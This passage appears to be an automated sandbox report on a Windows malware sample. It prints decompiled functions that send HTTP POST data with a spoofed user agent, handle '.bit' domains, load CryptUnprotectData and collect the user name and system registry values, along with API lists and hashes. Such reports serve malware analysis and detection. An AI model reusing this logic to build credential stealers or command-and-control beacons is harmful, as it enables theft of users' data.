				_v20 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0xc]));
				_v24 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x1a]));
				_v28 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x2b]));
				_v32 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x3c]));
				_v36 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x53]));
				_v40 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x64]));
				_t375 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x75]));
				_v44 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x89]));
				_v48 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x9b]));
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				E00404F5C();
				 *_t373 = 0x3c;
				 *((intOrPtr*)(_t373 + 4)) =  &_v132;
				 *((intOrPtr*)(_t373 + 8)) = 0x20;
				 *(_t373 + 0x10) =  &_v388;
				 *((intOrPtr*)(_t373 + 0x14)) = 0x100;
				 *((intOrPtr*)(_t373 + 0x1c)) =  &_v516;
				 *((intOrPtr*)(_t373 + 0x20)) = 0x80;
				 *((intOrPtr*)(_t373 + 0x24)) =  &_v644;
				 *((intOrPtr*)(_t373 + 0x28)) = 0x80;
				 *(_t373 + 0x2c) =  &_v2692;
				 *((intOrPtr*)(_t373 + 0x30)) = 0x800;
				 *((intOrPtr*)(_t373 + 0x34)) =  &_v3716;
				 *((intOrPtr*)(_t373 + 0x38)) = 0x400;
				_t223 = E00403790(_v56);
				InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t373);
				E004036DC( &_v100,  *(_t373 + 0x10));
				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
				if(E00403AD4(0x418374, _v69416) != 0) {
					_v73 = 1;
					E004036DC( &_v69420,  *(_t373 + 0x10));
					E004037DC( &_v88, _v69420, "Host: ");
					E00417668(_v100, _t326,  &_v69424, _t373, _t375);
					 *(_t373 + 0x10) = E00403990(_v69424);
				}
				_t327 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
				if(_t327 != 0) {
					_v84 = 0x2dc6c0;
					_v48(_t327, 6,  &_v84, 4);
					_v48(_t327, 5,  &_v84, 4);
					_v64 = InternetConnectA(_t327,  *(_t373 + 0x10),  *(_t373 + 0x18), 0, 0, 3, 0, 0);
					if(_v64 != 0) {
						_v80 = 0x84003300;
						E004036DC( &_v69428,  *((intOrPtr*)(_t373 + 4)));
						if(E00403AD4(0x4183c8, _v69428) != 0) {
							_v80 = _v80 | 0x00800000;
						}
						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t373 + 0x2c), 0, 0, 0, _v80, 0);
						if(_v68 != 0) {
							if(_v73 != 0) {
								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
							}
							_t290 = E00403790(_v12);
							if(HttpSendRequestA(_v68, 0x4183cc, 0, E00403990(_v12), _t290) != 0) {
								do {
									E00404F5C();
									_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
									E004035D4( &_v96, _v60,  &_v69412);
									_t304 = E00403798( &_v92, _v96);
									asm("sbb eax, eax");
								} while (_t304 + 1 != 0 && _v60 != 0);
							}
						}
						 *_t375(_v68);
					}
					 *_t375(_v64);
				}
				 *_t375(_t327);
				_t393 = _v92;
				if(_t393 == 0) {
					_push(_v100);
					_push(_v12);
					_push( *(_t373 + 0x18));
					_push( &_v92);
					E004036DC( &_v69432,  *(_t373 + 0x2c));
					_push(_v69432);
					E004036DC( &_v69436,  *(_t373 + 0x10));
					_pop(_t362);
					E00417820(_v69436, _t327, _v16, _t362, _t375);
				}
				E004038DC(_v16, 0x4182ac);
				if(_t393 == 0) {
					E0040627C(_v100, _t327,  &_v69440, _t375, _t393);
					E004038DC(_v69440, "699F0FFD");
				}
				E00403538(_a4, _v92);
				E004034E4( &_v92);
				_pop(_t353);
				 *[fs:eax] = _t353;
				_push(E00418299);
				E00403508( &_v69440, 7);
				E00403508( &_v100, 4);
				E00403508( &_v56, 2);
				return E00403508( &_v16, 3);
			}

0x00417d85
0x00417d88
0x00417d8d
0x00417d8d
0x00417d8f
0x00417d91
0x00417d91
0x00417d94
0x00417d94
0x00417d9a
0x00417d9d
0x00417da0
0x00417da6
0x00417dae
0x00417db6
0x00417dbb
0x00417dc3
0x00417dc4
0x00417dc9
0x00417dcc
0x00417dd3
0x00417ddd
0x00417ddd
0x00417de5
0x00417df0
0x00417df5
0x00417e01
0x00417e14
0x00417e18
0x00417e23
0x00417e28
0x00417e28
0x00417e3c
0x00417e51
0x00417e66
0x00417e7b
0x00417e90
0x00417ea5
0x00417eba
0x00417ed0
0x00417ee7
0x00417ef2
0x00417f02
0x00417f12
0x00417f22
0x00417f32
0x00417f42
0x00417f4e
0x00417f53
0x00417f5c
0x00417f5f
0x00417f6c
0x00417f6f
0x00417f7c
0x00417f7f
0x00417f8c
0x00417f8f
0x00417f9c
0x00417f9f
0x00417fac
0x00417faf
0x00417fbf
0x00417fce
0x00417fd7
0x00417ff8
0x0041800f
0x00418011
0x0041801e
0x00418031
0x0041803f
0x0041804f
0x0041804f
0x00418062
0x00418066
0x0041806c
0x0041807c
0x00418088
0x004180a2
0x004180a9
0x004180af
0x004180bf
0x004180d6
0x004180d8
0x004180d8
0x004180ff
0x00418106
0x00418110
0x0041812d
0x0041812d
0x00418133
0x00418152
0x00418154
0x0041815f
0x0041817b
0x0041818a
0x00418195
0x0041819e
0x004181a1
0x00418154
0x00418152
0x004181af
0x004181af
0x004181b5
0x004181b5
0x004181b8
0x004181ba
0x004181be
0x004181c3
0x004181c7
0x004181cc
0x004181d0
0x004181da
0x004181e5
0x004181ef
0x004181fd
0x004181fe
0x004181fe
0x0041820b
0x00418210
0x0041821b
0x0041822b
0x0041822b
0x00418240
0x00418248
0x0041824f
0x00418252
0x00418255
0x00418265
0x00418272
0x0041827f
0x00418291

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D

Strings

699F0FFD, xrefs: 00418226
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041805A
Host: , xrefs: 0041802C
POST, xrefs: 00417DD8, 00418206
wininet.dll, xrefs: 00417DFC
.bit, xrefs: 00418003

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$Internet$HttpOpenRequest$ConnectCrackHandleLibraryLoadModuleSend
String ID: .bit$699F0FFD$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 3818312118-4094887192
Opcode ID: 5426785b2c93e71bb720d3844f0bf3b5d53ea999dd08074bdd8b235e38f763da
Instruction ID: 5b133b9addfad1444578419e9148cb156d847e9dbbf5ea098b4cdfe065b0ee4c
Opcode Fuzzy Hash: 5426785b2c93e71bb720d3844f0bf3b5d53ea999dd08074bdd8b235e38f763da
Instruction Fuzzy Hash: 01E10FB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00406BD8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406BD8(void* __eax) {
				char _v516;
				int _v520;
				void* _v524;
				long _t13;
				long _t19;
				long _t23;
				void* _t26;

				_t26 = __eax;
				_v520 = 0x100;
				E00403C18(__eax, 0x406c70);
				_t13 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0, 0, 0x20019, 0,  &_v524, 0); // executed
				if(_t13 == 0) {
					_t19 = RegQueryValueExW(_v524, L"ProductName", 0, 0,  &_v516,  &_v520); // executed
					if(_t19 == 0) {
						E00403D6C(_t26, 0x100,  &_v516);
					}
					_t23 = RegCloseKey(_v524); // executed
					return _t23;
				}
				return _t13;
			}

0x00406bdf
0x00406be1
0x00406bf0
0x00406c1a
0x00406c1e
0x00406c3f
0x00406c43
0x00406c50
0x00406c50
0x00406c60
0x00000000
0x00406c60
0x00406c69

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
RegQueryValueExW.KERNELBASE(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
RegCloseKey.KERNELBASE(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60

Strings

ProductName, xrefs: 00406C2E
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocCloseCreateQueryStringValue
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3260168215-1787575317
Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6AA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A6AA() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				 *0x41ca68 =  *0x41ca68 - 1;
				if( *0x41ca68 < 0) {
					_t2 = LoadLibraryA("crypt32.dll"); // executed
					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
					 *0x41ca64 = _t3;
					return _t3;
				}
				return _t1;
			}

0x0040a6ac
0x0040a6b3
0x0040a6bf
0x0040a6c5
0x0040a6ca
0x00000000
0x0040a6ca
0x0040a6cf

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5

Strings

CryptUnprotectData, xrefs: 0040A6B5
crypt32.dll, xrefs: 0040A6BA

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
Opcode Fuzzy Hash: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F

Uniqueness

Uniqueness Score: -1.00%

Function 00407C34, Relevance: 3.1, APIs: 2, Instructions: 84COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A

Uniqueness

Uniqueness Score: -1.00%

Function 00407C33, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759

Uniqueness

Uniqueness Score: -1.00%

Function 00407D14, Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: AccountFreeLookup
String ID:
API String ID: 3905513331-0
Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406E68, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E68(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t18;
				intOrPtr _t52;
				void* _t56;

				_t18 = __eax - 0x55000000;
				_v12 = __ecx;
				_v8 = __edx;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t56);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t18, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e68
0x00406e76
0x00406e79
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406E6C, Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00406E6C(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				int _v20;
				void* _v24;
				char _v536;
				void* _t44;
				intOrPtr _t51;
				void* _t55;

				_v12 = __ecx;
				_v8 = __edx;
				_t44 = __eax;
				E00404150( &_v8);
				E00404150( &_v12);
				_push(_t55);
				_push(0x406f1f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffdec;
				_v20 = 0xfe;
				_v536 = 0;
				RegOpenKeyExW(_t44, E00403D98(_v8), 0, 0x20119,  &_v24); // executed
				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed
				E00403D6C(_a4, 0x100,  &_v536);
				_pop(_t51);
				 *[fs:eax] = _t51;
				_push(E00406F26);
				return E00403BF4( &_v12, 2);
			}

0x00406e76
0x00406e79
0x00406e7c
0x00406e81
0x00406e89
0x00406e90
0x00406e91
0x00406e96
0x00406e99
0x00406e9c
0x00406ea3
0x00406ec8
0x00406eef
0x00406eff
0x00406f06
0x00406f09
0x00406f0c
0x00406f1e

APIs

Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF

Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65

Uniqueness

Uniqueness Score: -1.00%

Function 00401388, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401388(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E0040123C(0x41c5d4, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x0040138b
0x00401395
0x004013a4
0x00401397
0x00401397
0x00401397
0x004013aa
0x004013b7
0x004013bc
0x004013be
0x004013c2
0x004013cb
0x004013d2
0x004013de
0x004013e5
0x00000000
0x004013e5
0x004013d2
0x004013ea

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr* __eax) {
				short _v516;
				signed int _t4;
				signed int _t5;
				int _t9;
				void* _t11;
				signed int _t14;
				void* _t18;
				DWORD* _t19;

				_t4 = __eax +  *__eax;
				 *_t4 =  *_t4 + _t4;
				_t5 = _t4 | 0x5300000a;
				_t19 = _t18 + 0xfffffdfc;
				_t14 = _t5;
				 *_t19 = 0xff;
				_t9 = GetUserNameW( &_v516, _t19); // executed
				if(_t9 == 0) {
					_t11 = E00403BDC(_t14);
				} else {
					_t11 = E00403D6C(_t14, 0x100,  &_v516);
				}
				return _t11;
			}

0x004065e8
0x004065ea
0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction ID: 5a5990060c673b8f00593b581c9a0ee3644ab744bab1f058c1932740bd518d27
Opcode Fuzzy Hash: 153b4ec9fa6da1239e45f29a021cf1180a625503ea610292dda7591db46c391b
Instruction Fuzzy Hash: 1BE0DFB12083424FC3119BA8D880AA53BE49F49300F044876B8D5C72E1FE35CE248753

Uniqueness

Uniqueness Score: -1.00%

Function 004065EC, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065EC(signed int __eax) {
				short _v516;
				signed int _t4;
				int _t8;
				void* _t10;
				signed int _t13;
				void* _t17;
				DWORD* _t18;

				_t4 = __eax | 0x5300000a;
				_t18 = _t17 + 0xfffffdfc;
				_t13 = _t4;
				 *_t18 = 0xff;
				_t8 = GetUserNameW( &_v516, _t18); // executed
				if(_t8 == 0) {
					_t10 = E00403BDC(_t13);
				} else {
					_t10 = E00403D6C(_t13, 0x100,  &_v516);
				}
				return _t10;
			}

0x004065ec
0x004065f1
0x004065f7
0x004065f9
0x0040660d
0x00406611
0x00406627
0x00406613
0x0040661e
0x0040661e
0x00406633

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction ID: 7803372b71e91cd4900786e151d6695f3fca8b78fda9d7e8201226f5ab6c0eae
Opcode Fuzzy Hash: 60f9d436da294c5ff49d132d20e00676374c28b1533c3170959a1c115f4756e2
Instruction Fuzzy Hash: D7E08CB16043065BD3109AA8D880AAA76E89B88300F00493AB89AD73D0FE39CE248647

Uniqueness

Uniqueness Score: -1.00%

Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}

0x00403614
0x0040361a
0x00403620

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
